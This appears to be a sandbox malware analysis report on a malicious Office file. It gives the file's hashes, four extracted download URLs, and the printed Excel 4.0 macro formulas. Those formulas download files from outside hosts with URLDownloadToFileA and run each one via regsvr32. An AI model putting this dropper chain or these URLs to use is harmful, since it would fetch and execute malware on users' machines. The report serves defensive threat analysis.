General
-
Target
c21ba07000bcc72694c45f39d6bec6b421d7b6ca836992208d9f75bdcaecc2c7
-
Size
92KB
-
MD5
33185ad1888d604b0e80eba802782a01
-
SHA1
7ba7fcf1be4caef79fd8a815d2553c0feafbb5d6
-
SHA256
c21ba07000bcc72694c45f39d6bec6b421d7b6ca836992208d9f75bdcaecc2c7
-
SHA512
f069bdfc15b8eed7710716dc1f2b218ee1bce3bf7749e95f73b532a594b5310347c497317f60638e719bdfaf368ae0e703a6ed29f5bb78a636b41e2574cc1a54
-
SSDEEP
1536:8Vk3hOdsylKlgxopeiBNhZFGzE+cL2kdADTCXuZH4Ib4CEndJ4huPYax0:sk3hOdsylKlgxopeiBNhZFGzE+cL2kdC
Malware Config
Extracted
http://hsweixintp.com/wp-admin/4m1WxDxza6D8SVrfF/
http://www.stickers-et-deco.com/admin002vqimbe/hRFZkkzLIl/
http://www.cecambrils.cat/wp-content/cXEhHssszV/
http://www.clinicaportalpsicologia.com.br/wp-includes/d6tkyFFBNwY/
-
formulas
=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://hsweixintp.com/wp-admin/4m1WxDxza6D8SVrfF/","..\elv1.ooocccxxx",0,0) =EXEC("C:\Windows\System32\regsvr32.exe /S ..\elv1.ooocccxxx") =CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://www.stickers-et-deco.com/admin002vqimbe/hRFZkkzLIl/","..\elv2.ooocccxxx",0,0) =EXEC("C:\Windows\System32\regsvr32.exe /S ..\elv2.ooocccxxx") =CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://www.cecambrils.cat/wp-content/cXEhHssszV/","..\elv3.ooocccxxx",0,0) =EXEC("C:\Windows\System32\regsvr32.exe /S ..\elv3.ooocccxxx") =CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://www.clinicaportalpsicologia.com.br/wp-includes/d6tkyFFBNwY/","..\elv4.ooocccxxx",0,0) =EXEC("C:\Windows\System32\regsvr32.exe /S ..\elv4.ooocccxxx") =RETURN()
Signatures
-
Suspicious Office macro 1 IoCs
Office document equipped with 4.0 macros.
Files
-
c21ba07000bcc72694c45f39d6bec6b421d7b6ca836992208d9f75bdcaecc2c7